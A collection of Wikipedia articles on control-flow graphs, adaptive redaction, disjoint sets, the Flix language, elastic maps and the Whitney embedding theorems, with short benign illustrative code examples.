Unreachable code and infinite loops are possible even if the programmer does not explicitly code them: optimizations like constant propagation and constant folding followed by jump threading can collapse multiple basic blocks into one, cause edges to be removed from a CFG, etc., thus possibly disconnecting parts of the graph.
A block M dominates a block N if every path from the entry that reaches block N has to pass through block M. The entry block dominates all blocks.
In the reverse direction, block M postdominates block N if every path from N to the exit has to pass through block M. The exit block postdominates all blocks.
It is said that a block M immediately dominates block N if M dominates N, and there is no intervening block P such that M dominates P and P dominates N. In other words, M is the last dominator on all paths from entry to N. Each block has a unique immediate dominator.
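Dominator sets can be computed with the classic iterative dataflow algorithm; a sketch on the example CFG from above (the simple fixed-point version, not the faster Lengauer–Tarjan algorithm):

```python
def dominators(graph, entry):
    """Fixed-point dataflow computation of dominator sets:
    dom(entry) = {entry};  dom(n) = {n} ∪ ⋂ dom(p) over predecessors p."""
    nodes = set(graph)
    preds = {n: [p for p in graph if n in graph[p]] for n in graph}
    dom = {n: set(nodes) for n in nodes}
    dom[entry] = {entry}
    changed = True
    while changed:
        changed = False
        for n in nodes - {entry}:
            new = {n} | set.intersection(*(dom[p] for p in preds[n]))
            if new != dom[n]:
                dom[n], changed = new, True
    return dom

# On the example CFG (A→B, A→C, B→D, C→D): A dominates every block, and
# the immediate dominator of D is A, since D can be reached via B or via C.
cfg = {"A": ["B", "C"], "B": ["D"], "C": ["D"], "D": []}
dom = dominators(cfg, "A")
assert dom["D"] == {"A", "D"}
assert dom["B"] == {"A", "B"}
```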
Similarly, there is a notion of immediate postdominator, analogous to immediate dominator.
The dominator tree is an ancillary data structure depicting the dominator relationships. There is an arc from block M to block N if M is an immediate dominator of N. This graph is a tree, since each block has a unique immediate dominator. This tree is rooted at the entry block. The dominator tree can be calculated efficiently using Lengauer–Tarjan's algorithm.
A postdominator tree is analogous to the dominator tree. This tree is rooted at the exit block.
A back edge is an edge that points to a block that has already been met during a depth-first search (DFS) traversal of the graph. Back edges are typical of loops.
A critical edge is an edge which is neither the only edge leaving its source block, nor the only edge entering its destination block. These edges must be split: a new block must be created in the middle of the edge, in order to insert computations on the edge without affecting any other edges.
An abnormal edge is an edge whose destination is unknown. Exception handling constructs can produce them. These edges tend to inhibit optimization.
An impossible edge (also known as a fake edge) is an edge which has been added to the graph solely to preserve the property that the exit block postdominates all blocks. It cannot ever be traversed.
A loop header (sometimes called the entry point of the loop) is a dominator that is the target of a loop-forming back edge. The loop header dominates all blocks in the loop body. A block may be a loop header for more than one loop. A loop may have multiple entry points, in which case it has no "loop header".
Suppose block M is a dominator with several incoming edges, some of them being back edges (so M is a loop header). It is advantageous to several optimization passes to break M up into two blocks, Mpre and Mloop. The contents of M and the back edges are moved to Mloop, the rest of the edges are moved to point into Mpre, and a new edge from Mpre to Mloop is inserted (so that Mpre is the immediate dominator of Mloop). In the beginning, Mpre would be empty, but passes like loop-invariant code motion could populate it. Mpre is called the loop pre-header, and Mloop would be the loop header.
A reducible CFG is one whose edges can be partitioned into two disjoint sets, forward edges and back edges, such that the forward edges form a directed acyclic graph in which every node is reachable from the entry node, and for each back edge (A, B) the node B dominates the node A.[5]
Structured programming languages are often designed such that all CFGs they produce are reducible, and common structured programming statements such as IF, FOR, WHILE, BREAK, and CONTINUE produce reducible graphs. To produce irreducible graphs, statements such as GOTO are needed. Irreducible graphs may also be produced by some compiler optimizations.
The loop connectedness of a CFG is defined with respect to a given depth-first search tree (DFST) of the CFG. This DFST should be rooted at the start node and cover every node of the CFG.
Edges in the CFG which run from a node to one of its DFST ancestors (including itself) are called back edges.
The loop connectedness is the largest number of back edges found in any cycle-free path of the CFG. In a reducible CFG, the loop connectedness is independent of the DFST chosen.[6][7]
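The back edges themselves are easy to identify with a single traversal; a sketch on a hypothetical graph (computing the loop connectedness itself would additionally require examining cycle-free paths, which is omitted here):

```python
def back_edges(cfg, entry):
    """Return edges (u, v) where v is a DFS-tree ancestor of u
    (or u itself), i.e. the back edges of this particular DFS."""
    back, on_stack, visited = [], set(), set()

    def dfs(u):
        visited.add(u)
        on_stack.add(u)           # u is now an ancestor of everything below
        for v in cfg[u]:
            if v in on_stack:     # edge into an ancestor: a back edge
                back.append((u, v))
            elif v not in visited:
                dfs(v)
        on_stack.discard(u)

    dfs(entry)
    return back

# A simple while-loop shape: header -> body -> header
cfg = {"entry": ["header"], "header": ["body", "exit"],
       "body": ["header"], "exit": []}
assert back_edges(cfg, "entry") == [("body", "header")]
```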
Loop connectedness has been used to reason about the time complexity of data-flow analysis.[6]
While control-flow graphs represent the control flow of a single procedure, inter-procedural control-flow graphs represent the control flow of whole programs.[8]
|
https://en.wikipedia.org/wiki/Control-flow_graph
|
Adaptive redaction is a form of redaction whereby sensitive parts of a document are automatically removed based on policy. It is primarily used in next-generation data loss prevention (DLP) solutions.[1]
The policy is a set of rules based on content and context. Context can include:
The content can be 'visible' information, such as the text seen on screen. For example, sending unprotected credit card information outside an organisation breaches the Payment Card Industry Data Security Standard (PCI DSS). Many organisations accept credit card information through incoming email, but a reply to an email containing such information would send the prohibited information out, causing a breach of policy. Adaptive redaction can be used to remove just the credit card number while still allowing the email to be sent.
Content can also be 'invisible' information, such as that in document properties and revision history, and 'active' content embedded in an electronic document, such as a macro. Release of 'invisible' information has on several occasions created embarrassment for government bodies.[2][3]
Adaptive redaction is designed to alleviate false-positive events created by data loss prevention (DLP) security solutions. False positives occur when a DLP policy triggers and prevents legitimate outgoing communication. In the majority of cases this is caused by oversight on the part of the sender.
|
https://en.wikipedia.org/wiki/Adaptive_redaction
|
In set theory in mathematics and formal logic, two sets are said to be disjoint if they have no element in common. Equivalently, two disjoint sets are sets whose intersection is the empty set.[1] For example, {1, 2, 3} and {4, 5, 6} are disjoint, while {1, 2, 3} and {3, 4, 5} are not. A collection of two or more sets is called disjoint if any two distinct sets of the collection are disjoint.
This definition of disjoint sets can be extended to families of sets and to indexed families of sets.
By definition, a collection of sets is called a family of sets (such as the power set, for example). In some sources this is a set of sets, while other sources allow it to be a multiset of sets, with some sets repeated.
An indexed family of sets (A_i)_{i∈I} is by definition a set-valued function (that is, a function that assigns a set A_i to every element i ∈ I in its domain) whose domain I is called its index set (and elements of its domain are called indices).
There are two subtly different definitions for when a family of sets F is called pairwise disjoint. According to one such definition, the family is disjoint if each two sets in the family are either identical or disjoint. This definition would allow pairwise disjoint families of sets to have repeated copies of the same set. According to an alternative definition, each two sets in the family must be disjoint; repeated copies are not allowed. The same two definitions can be applied to an indexed family of sets: according to the first definition, every two distinct indices in the family must name sets that are disjoint or identical, while according to the second, every two distinct indices must name disjoint sets.[2] For example, the family of sets { {0, 1, 2}, {3, 4, 5}, {6, 7, 8}, ... } is disjoint according to both definitions, as is the family { {..., −2, 0, 2, 4, ...}, {..., −3, −1, 1, 3, 5} } of the two parity classes of integers. However, the family ({ n + 2k | k ∈ Z })_{n ∈ {0, 1, ..., 9}} with 10 members has five repetitions each of two disjoint sets, so it is pairwise disjoint under the first definition but not under the second.
Two sets are said to be almost disjoint if their intersection is small in some sense. For instance, two infinite sets whose intersection is a finite set may be said to be almost disjoint.[3]
In topology, there are various notions of separated sets with stricter conditions than disjointness. For instance, two sets may be considered separated when they have disjoint closures or disjoint neighborhoods. Similarly, in a metric space, positively separated sets are sets separated by a nonzero distance.[4]
Disjointness of two sets, or of a family of sets, may be expressed in terms of intersections of pairs of them.
Two sets A and B are disjoint if and only if their intersection A ∩ B is the empty set.[1] It follows from this definition that every set is disjoint from the empty set, and that the empty set is the only set that is disjoint from itself.[5]
If a collection contains at least two sets, the condition that the collection is disjoint implies that the intersection of the whole collection is empty. However, a collection of sets may have an empty intersection without being disjoint. Additionally, while a collection of fewer than two sets is trivially disjoint, as there are no pairs to compare, the intersection of a collection of one set is equal to that set, which may be non-empty.[2] For instance, the three sets { {1, 2}, {2, 3}, {1, 3} } have an empty intersection but are not disjoint; in fact, no two sets in this collection are disjoint.
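The distinction between an empty overall intersection and pairwise disjointness can be checked mechanically; a small sketch using the three sets from the text:

```python
from itertools import combinations
from functools import reduce

def pairwise_disjoint(sets):
    """True iff every pair of sets in the collection is disjoint."""
    return all(a.isdisjoint(b) for a, b in combinations(sets, 2))

sets = [{1, 2}, {2, 3}, {1, 3}]
common = reduce(set.intersection, sets)
assert common == set()              # the whole intersection is empty ...
assert not pairwise_disjoint(sets)  # ... yet no two of the sets are disjoint
assert pairwise_disjoint([{1, 2, 3}, {4, 5, 6}])
```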
The empty family of sets is pairwise disjoint.[6]
A Helly family is a system of sets within which the only subfamilies with empty intersections are the ones that are pairwise disjoint. For instance, the closed intervals of the real numbers form a Helly family: if a family of closed intervals has an empty intersection and is minimal (i.e. no subfamily of the family has an empty intersection), it must be pairwise disjoint.[7]
A partition of a set X is any collection of mutually disjoint non-empty sets whose union is X.[8] Every partition can equivalently be described by an equivalence relation, a binary relation that describes whether two elements belong to the same set in the partition.[8] Disjoint-set data structures[9] and partition refinement[10] are two techniques in computer science for efficiently maintaining partitions of a set subject to, respectively, union operations that merge two sets or refinement operations that split one set into two.
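A minimal disjoint-set (union–find) structure, maintaining a partition under union operations with the two standard optimizations:

```python
class DisjointSet:
    """Maintains a partition of a set of elements under union operations."""

    def __init__(self, elements):
        self.parent = {e: e for e in elements}  # each element is its own set
        self.size = {e: 1 for e in elements}

    def find(self, x):
        """Return the representative of x's set, compressing the path."""
        root = x
        while self.parent[root] != root:
            root = self.parent[root]
        while self.parent[x] != root:           # path compression
            self.parent[x], x = root, self.parent[x]
        return root

    def union(self, x, y):
        """Merge the sets containing x and y (union by size)."""
        rx, ry = self.find(x), self.find(y)
        if rx == ry:
            return
        if self.size[rx] < self.size[ry]:
            rx, ry = ry, rx
        self.parent[ry] = rx
        self.size[rx] += self.size[ry]

ds = DisjointSet(range(5))
ds.union(0, 1)
ds.union(3, 4)
assert ds.find(0) == ds.find(1)   # 0 and 1 now share a set
assert ds.find(0) != ds.find(3)   # 0 and 3 are still in disjoint sets
```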
A disjoint union may mean one of two things. Most simply, it may mean the union of sets that are disjoint.[11] But if two or more sets are not already disjoint, their disjoint union may be formed by modifying the sets to make them disjoint before forming the union of the modified sets.[12] For instance, two sets may be made disjoint by replacing each element by an ordered pair of the element and a binary value indicating whether it belongs to the first or second set.[13] For families of more than two sets, one may similarly replace each element by an ordered pair of the element and the index of the set that contains it.[14]
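The tagging construction described above can be sketched in a few lines: each element is paired with the index of the set it came from, so shared elements survive as distinct tagged copies:

```python
def disjoint_union(*sets):
    """Tag each element with its set's index, then take the plain union."""
    return {(i, x) for i, s in enumerate(sets) for x in s}

a, b = {1, 2, 3}, {3, 4}
u = disjoint_union(a, b)
assert len(u) == len(a) + len(b)      # 3 appears twice, once per tag
assert (0, 3) in u and (1, 3) in u    # the two tagged copies of 3
```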
|
https://en.wikipedia.org/wiki/Disjoint_sets
|
Flix is a functional, imperative, and logic programming language developed at Aarhus University, with funding from the Independent Research Fund Denmark,[2] and by a community of open source contributors.[3] The Flix language supports algebraic data types, pattern matching, parametric polymorphism, currying, higher-order functions, extensible records,[4] channel- and process-based concurrency, and tail call elimination. Two notable features of Flix are its type and effect system[5] and its support for first-class Datalog constraints.[6]
The Flix type and effect system supports Hindley–Milner-style type inference. The system separates pure and impure code: if an expression is typed as pure then it cannot produce an effect at run-time. Higher-order functions can enforce that they are given pure (or impure) function arguments. The type and effect system supports effect polymorphism,[7][8] which means that the effect of a higher-order function may depend on the effect(s) of its argument(s).
Flix supports Datalog programs as first-class values. A Datalog program value, i.e. a collection of Datalog facts and rules, can be passed to and returned from functions, stored in data structures, and composed with other Datalog program values. The minimal model of a Datalog program value can be computed and is itself a Datalog program value. In this way, Flix can be viewed as a meta programming language for Datalog. Flix supports stratified negation and the Flix compiler ensures stratification at compile-time.[9] Flix also supports an enriched form of Datalog constraints where predicates are given lattice semantics.[10][11][12][13]
Flix is a programming language in the ML family of languages. Its type and effect system is based on Hindley–Milner with several extensions, including row polymorphism and Boolean unification. The syntax of Flix is inspired by Scala and uses short keywords and curly braces. Flix supports uniform function call syntax, which allows a function call f(x, y, z) to be written as x.f(y, z). The concurrency model of Flix is inspired by Go and based on channels and processes. A process is a lightweight thread that does not share (mutable) memory with another process. Processes communicate over channels, which are bounded or unbounded queues of immutable messages.
While many programming languages support a mixture of functional and imperative programming, the Flix type and effect system tracks the purity of every expression, making it possible to write parts of a Flix program in a purely functional style with purity enforced by the effect system.
Flix programs compile to JVM bytecode and are executable on the Java Virtual Machine (JVM).[14] The Flix compiler performs whole-program compilation, eliminates polymorphism via monomorphization,[15] and uses tree shaking to remove unreachable code.
Monomorphization avoids boxing of primitive values at the cost of longer compilation times and larger executable binaries. Flix has some support for interoperability with programs written in Java.[16]
Flix supports tail call elimination, which ensures that function calls in tail position never consume stack space and hence cannot cause the call stack to overflow.[17] Since the JVM instruction set lacks explicit support for tail calls, such calls are emulated using a form of reusable stack frames.[18] Support for tail call elimination is important since all iteration in Flix is expressed through recursion.
The Flix compiler disallows most forms of unused or redundant code, including unused local variables, unused functions, unused formal parameters, unused type parameters, and unused type declarations; such unused constructs are reported as compiler errors.[19] Variable shadowing is also disallowed. The stated rationale is that unused or redundant code is often correlated with erroneous code.[20]
A Visual Studio Code extension for Flix is available.[21] The extension is based on the Language Server Protocol, a common interface between IDEs and compilers developed by Microsoft.
Flix is open source software available under the Apache 2.0 License.
The following program prints "Hello World!" when compiled and executed:
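The fragment itself is not reproduced in this text. Based on the description that follows (a main function with no parameters, a Unit return type, the IO effect, and a call to printLine), it would resemble the following sketch; exact syntax varies between Flix versions:

```
def main(): Unit \ IO =
    printLine("Hello World!")
```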
The type and effect signature of the main function specifies that it has no parameters, returns a value of type Unit, and that the function has the IO effect, i.e. is impure. The main function is impure because it invokes printLine, which is impure.
The following program fragment declares an algebraic data type (ADT) named Shape:
The ADT has three constructors: Circle, Square, and Rectangle.
The following program fragment uses pattern matching to destruct a Shape value:
The following program fragment defines a higher-order function named twice that, when given a function f from Int to Int, returns a function that applies f to its input two times:
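The fragment is missing from this text; based on the surrounding description, a sketch of such a function in Flix (syntax approximate) is:

```
def twice(f: Int32 -> Int32): Int32 -> Int32 = x -> f(f(x))
```

so that, for instance, twice(x -> x + 1)(0) evaluates to 2.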
We can use the function twice as follows:
Here the call to twice(x -> x + 1) returns a function that will increment its argument two times. Thus the result of the whole expression is 0 + 1 + 1 = 2.
The following program fragment illustrates a polymorphic function that maps a function f: a -> b over a list of elements of type a, returning a list of elements of type b:
The map function recursively traverses the list l and applies f to each element, constructing a new list.
Flix supports type parameter elision; hence it is not required that the type parameters a and b be explicitly introduced.
The following program fragment shows how to construct a record with two fields x and y:
Flix uses row polymorphism to type records. The sum function below takes a record that has x and y fields (and possibly other fields) and returns the sum of the two fields:
The following are all valid calls to the sum function:
The Flix type and effect system separates pure and impure expressions.[5][22][23] A pure expression is guaranteed to be referentially transparent. A pure function always returns the same value when given the same argument(s) and cannot have any (observable) side-effects.
For example, the following expression is of type Int32 and has the empty effect set {}, i.e. it is pure:
whereas the following expression has the IO effect, i.e. is impure:
A higher-order function can specify that a function argument must be pure, impure, or that it is effect polymorphic.
For example, the definition of Set.exists requires that its function argument f is pure:
The requirement that f must be pure ensures that implementation details do not leak. For example, since f is pure it cannot be used to determine in what order the elements of the set are traversed. If f were impure, such details could leak, e.g. by passing a function that also prints the current element, revealing the internal element order inside the set.
A higher-order function can also require that a function is impure.
For example, the definition of List.foreach requires that its function argument f is impure:
The requirement that f must be impure ensures that the code makes sense: it would be meaningless to call List.foreach with a pure function, since it always returns Unit.
The type and effect system is sound, but not complete. That is, if a function is pure then it cannot cause an effect, whereas if a function is impure then it may, but does not necessarily, cause an effect. For example, the following expression is impure even though it cannot produce an effect at run-time:
A higher-order function can also be effect polymorphic: its effect(s) can depend on its argument(s).
For example, the standard library definition of List.map is effect polymorphic:[24]
The List.map function takes a function f from elements of type a to b with effect e. The effect of the map function is itself e. Consequently, if List.map is invoked with a pure function then the entire expression is pure, whereas if it is invoked with an impure function then the entire expression is impure. It is effect polymorphic.
A higher-order function that takes multiple function arguments may combine their effects.
For example, the standard library definition of the forward function composition operator >> is pure if both of its function arguments are pure:[25]
The type and effect signature can be understood as follows: the >> function takes two function arguments: f with effect e1 and g with effect e2. The effect of >> is effect polymorphic in the conjunction of e1 and e2. If both are pure then the overall expression is pure.
The type and effect system allows arbitrary set expressions to control the purity of function arguments.
For example, it is possible to express a higher-order function h that accepts two function arguments f and g where the effects of f are disjoint from those of g:
If h is called with a function argument f which has the IO effect, then g cannot have the IO effect.
The type and effect system can be used to ensure that statement expressions are useful, i.e. that if an expression or function is evaluated and its result is discarded then it must have a side-effect. For example, compiling the program fragment below:
causes a compiler error:
because it is nonsensical to evaluate the pure expression List.map(x -> 2 * x, 1 :: 2 :: Nil) and then discard its result. Most likely the programmer wanted to use the result (or, alternatively, the expression is redundant and could be deleted). Consequently, Flix rejects such programs.
Flix supports Datalog programs as first-class values.[6][9][26] A Datalog program is a logic program that consists of a collection of unordered facts and rules. Together, the facts and rules imply a minimal model, a unique solution to any Datalog program. In Flix, Datalog program values can be passed to and returned from functions, stored in data structures, composed with other Datalog program values, and solved. The solution to a Datalog program (the minimal model) is itself a Datalog program. Thus, it is possible to construct pipelines of Datalog programs where the solution, i.e. "output", of one Datalog program becomes the "input" to another Datalog program.
The following edge facts define a graph:
The following Datalog rules compute the transitive closure of the edge relation:
The minimal model of the facts and rules is:
In Flix, Datalog programs are values. The above program can be embedded in Flix as follows:
The local variable f holds a Datalog program value that consists of the edge facts. Similarly, the local variable p is a Datalog program value that consists of the two rules. The f <+> p expression computes the composition (i.e. union) of the two Datalog programs f and p. The solve expression computes the minimal model of the combined Datalog program, returning the edge and path facts shown above.
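The semantics of solve can be mimicked in ordinary code by applying the rules until a fixpoint is reached. A Python sketch (the edge facts are invented, and the recursive rule is written in its linear form path(x, z) :- path(x, y), edge(y, z), which yields the same closure):

```python
def transitive_closure(edges):
    """Naive bottom-up evaluation of the edge/path Datalog program."""
    path = set(edges)                  # path(x, y) :- edge(x, y).
    while True:
        # path(x, z) :- path(x, y), edge(y, z).
        new = {(x, z) for (x, y) in path for (y2, z) in edges if y == y2}
        if new <= path:                # no new facts: minimal model reached
            return path
        path |= new

edges = {(1, 2), (2, 3), (3, 4)}
assert transitive_closure(edges) == {
    (1, 2), (2, 3), (3, 4), (1, 3), (2, 4), (1, 4)}
```

Flix evaluates first-class Datalog values natively; this fragment only mimics the fixpoint semantics of the minimal model.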
Since Datalog programs are first-class values, we can refactor the above program into several functions. For example:
The undirected closure of the graph can be computed by adding the rule:
We can modify the closure function to take a Boolean argument that determines whether we want to compute the directed or the undirected closure:
The Flix type system ensures that Datalog program values are well-typed.
For example, the following program fragment does not type check:
because in p1 the type of the Edge predicate is Edge(Int32, Int32) whereas in p2 it has type Edge(String, String). The Flix compiler rejects such programs as ill-typed.
The Flix compiler ensures that every Datalog program value constructed at run-time is stratified. Stratification is important because it guarantees the existence of a unique minimal model in the presence of negation. Intuitively, a Datalog program is stratified if there is no recursion through negation,[27] i.e. a predicate cannot depend negatively on itself. Given a Datalog program, a cycle detection algorithm can be used to determine whether it is stratified.
For example, the following Flix program contains an expression that cannot be stratified:
because the last expression constructs a Datalog program value whose precedence graph contains a negative cycle: the Bachelor predicate negatively depends on the Husband predicate, which in turn (positively) depends on the Bachelor predicate.
The Flix compiler computes the precedence graph for every Datalog program valued expression and determines its stratification at compile-time. If an expression is not stratified, the program is rejected by the compiler.
The stratification check is sound, but conservative. For example, the following program is unfairly rejected:
The type system conservatively assumes that both branches of the if expression can be taken and consequently infers that there may be a negative cycle between the A and B predicates. Thus the program is rejected, despite the fact that at run-time the main function always returns a stratified Datalog program value.
Flix is designed around a collection of stated principles:[28]
The principles also list several programming language features that have been deliberately omitted. In particular, Flix lacks support for:
|
https://en.wikipedia.org/wiki/Flix_(programming_language)
|
Elastic maps provide a tool for nonlinear dimensionality reduction. By their construction, they are a system of elastic springs embedded in the data space.[1] This system approximates a low-dimensional manifold. The elastic coefficients of this system allow a switch from completely unstructured k-means clustering (zero elasticity) to estimators located close to linear PCA manifolds (for high bending and low stretching moduli). With some intermediate values of the elasticity coefficients, this system effectively approximates non-linear principal manifolds. This approach is based on a mechanical analogy between principal manifolds, which pass through "the middle" of the data distribution, and elastic membranes and plates. The method was developed by A. N. Gorban, A. Y. Zinovyev and A. A. Pitenko in 1996–1998.
Let S be a data set in a finite-dimensional Euclidean space. An elastic map is represented by a set of nodes w_j in the same space. Each data point s ∈ S has a host node, namely the closest node w_j (if there are several closest nodes, one takes the node with the smallest number). The data set S is divided into classes K_j = { s | w_j is a host of s }.
The approximation energy D is the distortion

D = ∑_j ∑_{s ∈ K_j} ‖s − w_j‖²,

which is the energy of the springs with unit elasticity which connect each data point with its host node. It is possible to apply weighting factors to the terms of this sum, for example to reflect the standard deviation of the probability density function of any subset of data points {s_i}.
On the set of nodes an additional structure is defined. Some pairs of nodes, (w_i, w_j), are connected by elastic edges. Call this set of pairs E. Some triplets of nodes, (w_i, w_j, w_k), form bending ribs. Call this set of triplets G. The corresponding stretching and bending energies are

U_E = λ ∑_{(w_i, w_j) ∈ E} ‖w_i − w_j‖²,  U_G = μ ∑_{(w_i, w_j, w_k) ∈ G} ‖w_i − 2w_j + w_k‖²,

where λ and μ are the stretching and bending moduli respectively. The stretching energy is sometimes referred to as the membrane term, while the bending energy is referred to as the thin plate term.[5]
For example, on the 2D rectangular grid the elastic edges are just vertical and horizontal edges (pairs of closest vertices) and the bending ribs are the vertical or horizontal triplets of consecutive (closest) vertices.
The position of the nodes {w_j} is determined by the mechanical equilibrium of the elastic map, i.e. its location is such that it minimizes the total energy U.
For a given splitting of the data set S into classes K_j, minimization of the quadratic functional U is a linear problem with a sparse matrix of coefficients. Therefore, similarly to principal component analysis or k-means, a splitting method is used:
This expectation-maximization algorithm guarantees a local minimum of U. Various additional methods have been proposed to improve the approximation. For example, the softening strategy starts with a rigid grid (small length, small bending and large elasticity moduli λ and μ) and finishes with a soft grid (small λ and μ). The training goes in several epochs, each epoch with its own grid rigidity. Another adaptive strategy is the growing net: one starts from a small number of nodes and gradually adds new nodes. Each epoch goes with its own number of nodes.
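The splitting iteration can be sketched for the simplest case of a 1-D chain of nodes fitted to 2-D data. This is a minimal sketch with toy data; the initialisation along the first principal axis, the normalisation by the number of points, and the parameter values are our own choices, not taken from the original software:

```python
import numpy as np

def fit_elastic_map(data, k=8, lam=0.1, mu=0.5, iters=30):
    n = len(data)
    # initialise the chain of nodes along the first principal axis
    mean = data.mean(axis=0)
    u = np.linalg.svd(data - mean)[2][0]
    w = mean + np.linspace(-1, 1, k)[:, None] * u * data.std()
    # stretching (first-difference) and bending (second-difference) operators
    E = np.diff(np.eye(k), axis=0)
    B = np.diff(np.eye(k), n=2, axis=0)
    penalty = lam * E.T @ E + mu * B.T @ B
    for _ in range(iters):
        # E-step: assign each data point to its host (closest) node
        dists = ((data[:, None, :] - w[None, :, :]) ** 2).sum(axis=-1)
        host = dists.argmin(axis=1)
        # M-step: minimising the quadratic total energy U is a linear
        # system A w = rhs with a sparse coefficient matrix
        counts = np.bincount(host, minlength=k)
        rhs = np.zeros_like(w)
        np.add.at(rhs, host, data)
        A = np.diag(counts / n) + penalty
        w = np.linalg.solve(A, rhs / n)
    return w

# noiseless data on the line y = x: the fitted chain stays on that line
t = np.linspace(0.0, 1.0, 200)
nodes = fit_elastic_map(np.c_[t, t])
assert nodes.shape == (8, 2)
assert np.allclose(nodes[:, 0], nodes[:, 1], atol=1e-8)
```

A softening run would simply call this repeatedly with decreasing λ and μ, reusing the previous epoch's nodes as the starting configuration.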
The most important applications of the method and free software[3] are in bioinformatics[7][8] for exploratory data analysis and visualisation of multidimensional data, for data visualisation in economics, social and political sciences,[9] as an auxiliary tool for data mapping in geographic information systems, and for the visualisation of data of various natures.
The method is applied in quantitative biology for reconstructing the curved surface of a tree leaf from a stack of light microscopy images.[10] This reconstruction is used for quantifying the geodesic distances between trichomes and their patterning, which is a marker of the capability of a plant to resist pathogens.
More recently, the method has been adapted as a support tool in the decision process underlying the selection, optimization, and management of financial portfolios.[11]
The method of elastic maps has been systematically tested and compared with several machine learning methods on the applied problem of identification of the flow regime of a gas-liquid flow in a pipe.[12] There are various regimes: single-phase water or air flow, bubbly flow, bubbly-slug flow, slug flow, slug-churn flow, churn flow, churn-annular flow, and annular flow. The simplest and most common method used to identify the flow regime is visual observation. This approach is, however, subjective and unsuitable for relatively high gas and liquid flow rates. Therefore, machine learning methods have been proposed by many authors. The methods are applied to differential pressure data collected during a calibration process. The method of elastic maps provided a 2D map where the area of each regime is represented. The comparison with some other machine learning methods is presented in Table 1 for various pipe diameters and pressures.
Here, ANN stands for the backpropagation artificial neural networks, SVM for the support vector machine, and SOM for the self-organizing maps. The hybrid technology was developed for engineering applications.[13] In this technology, elastic maps are used in combination with principal component analysis (PCA), independent component analysis (ICA) and backpropagation ANN.
The textbook[14] provides a systematic comparison of elastic maps and self-organizing maps (SOMs) in applications to economic and financial decision-making.
|
https://en.wikipedia.org/wiki/Elastic_map
|
In mathematics, particularly in differential topology, there are two Whitney embedding theorems, named after Hassler Whitney:
The weak Whitney embedding is proved through a projection argument.
When the manifold is compact, one can first use a covering by finitely many local charts and then reduce the dimension with suitable projections.[1]: Ch. 1 §3 [2]: Ch. 6 [3]: Ch. 5 §3
The general outline of the proof is to start with an immersion f : M → R^{2m} with transverse self-intersections. These are known to exist from Whitney's earlier work on the weak immersion theorem. Transversality of the double points follows from a general-position argument. The idea is then to somehow remove all the self-intersections. If M has boundary, one can remove the self-intersections simply by isotoping M into itself (the isotopy being in the domain of f), to a submanifold of M that does not contain the double points. Thus, we are quickly led to the case where M has no boundary. Sometimes it is impossible to remove the double points via an isotopy; consider for example the figure-8 immersion of the circle in the plane. In this case, one needs to introduce a local double point.
Once one has two opposite double points, one constructs a closed loop connecting the two, giving a closed path in R^{2m}. Since R^{2m} is simply connected, one can assume this path bounds a disc, and provided 2m > 4 one can further assume (by the weak Whitney embedding theorem) that the disc is embedded in R^{2m} such that it intersects the image of M only in its boundary. Whitney then uses the disc to create a 1-parameter family of immersions, in effect pushing M across the disc, removing the two double points in the process. In the case of the figure-8 immersion with its introduced double point, the push-across move is quite simple (pictured).
This process of eliminating opposite-sign double points by pushing the manifold along a disc is called the Whitney trick.
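The figure-8 immersion of the circle mentioned above can be checked numerically. The parametrization f(t) = (sin t, sin t · cos t) is our own choice for illustration (Whitney's α_m is similar in spirit but given by explicit formulas not reproduced here); it is an immersion of the circle with exactly one transverse double point, at the origin:

```python
import math

def f(t):
    # figure-eight curve: hits (0, 0) at both t = 0 and t = pi
    return (math.sin(t), math.sin(t) * math.cos(t))

p0, p1 = f(0.0), f(math.pi)
assert max(abs(a - b) for a, b in zip(p0, p1)) < 1e-12   # same image point

def df(t, h=1e-6):
    # central-difference approximation of the tangent vector
    (x0, y0), (x1, y1) = f(t - h), f(t + h)
    return ((x1 - x0) / (2 * h), (y1 - y0) / (2 * h))

v0, v1 = df(0.0), df(math.pi)
cross = v0[0] * v1[1] - v0[1] * v1[0]
assert abs(cross) > 0.5   # nonzero cross product: the branches cross transversally
```

The exact tangents are (1, 1) and (−1, 1), so the cross product is 2; the two branches meet transversally, as required of the double points in the proof.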
To introduce a local double point, Whitney created immersions α_m : R^m → R^{2m} which are approximately linear outside of the unit ball, but contain a single double point. For m = 1 such an immersion is given by
Notice that if α is considered as a map to R³ like so:
then the double point can be resolved to an embedding:
Notice that β(t, 0) = α(t) and, for a ≠ 0, β(t, a) is an embedding as a function of t.
For higher dimensions m, there are α_m that can be similarly resolved in R^{2m+1}. For an embedding into R⁵, for example, define
This process ultimately leads one to the definition:
where
The key property of α_m is that it is an embedding except for the double point α_m(1, 0, ..., 0) = α_m(−1, 0, ..., 0). Moreover, for |(t_1, ..., t_m)| large, it is approximately the linear embedding (0, t_1, 0, t_2, ..., 0, t_m).
The Whitney trick was used by Stephen Smale to prove the h-cobordism theorem, from which follow the Poincaré conjecture in dimensions m ≥ 5 and the classification of smooth structures on discs (also in dimensions 5 and up). This provides the foundation for surgery theory, which classifies manifolds in dimension 5 and above.
Given two oriented submanifolds of complementary dimensions in a simply connected manifold of dimension ≥ 5, one can apply an isotopy to one of the submanifolds so that all the points of intersection have the same sign.
The occasion of the proof by Hassler Whitney of the embedding theorem for smooth manifolds is said (rather surprisingly) to have been the first complete exposition of the manifold concept, precisely because it brought together and unified the differing concepts of manifolds at the time: no longer was there any confusion as to whether abstract manifolds, intrinsically defined via charts, were any more or less general than manifolds extrinsically defined as submanifolds of Euclidean space. See also the history of manifolds and varieties for context.
Although every n-manifold embeds in R2n,{\displaystyle \mathbb {R} ^{2n},} one can frequently do better. Let e(n) denote the smallest integer such that all compact connected n-manifolds embed in Re(n).{\displaystyle \mathbb {R} ^{e(n)}.} Whitney's strong embedding theorem states that e(n) ≤ 2n. For n = 1, 2 we have e(n) = 2n, as the circle and the Klein bottle show. More generally, for n = 2k we have e(n) = 2n, as the 2k-dimensional real projective spaces show. Whitney's result can be improved to e(n) ≤ 2n − 1 unless n is a power of 2. This is a result of André Haefliger and Morris Hirsch (for n > 4) and C. T. C. Wall (for n = 3); these authors used important preliminary results and particular cases proved by Hirsch, William S. Massey, Sergey Novikov and Vladimir Rokhlin.[4] At present the function e is not known in closed form for all integers (compare to the Whitney immersion theorem, where the analogous number is known).
One can strengthen the results by putting additional restrictions on the manifold. For example, then-spherealways embeds inRn+1{\displaystyle \mathbb {R} ^{n+1}}– which is the best possible (closedn-manifolds cannot embed inRn{\displaystyle \mathbb {R} ^{n}}). Any compactorientablesurface and any compact surfacewith non-empty boundaryembeds inR3,{\displaystyle \mathbb {R} ^{3},}though anyclosed non-orientablesurface needsR4.{\displaystyle \mathbb {R} ^{4}.}
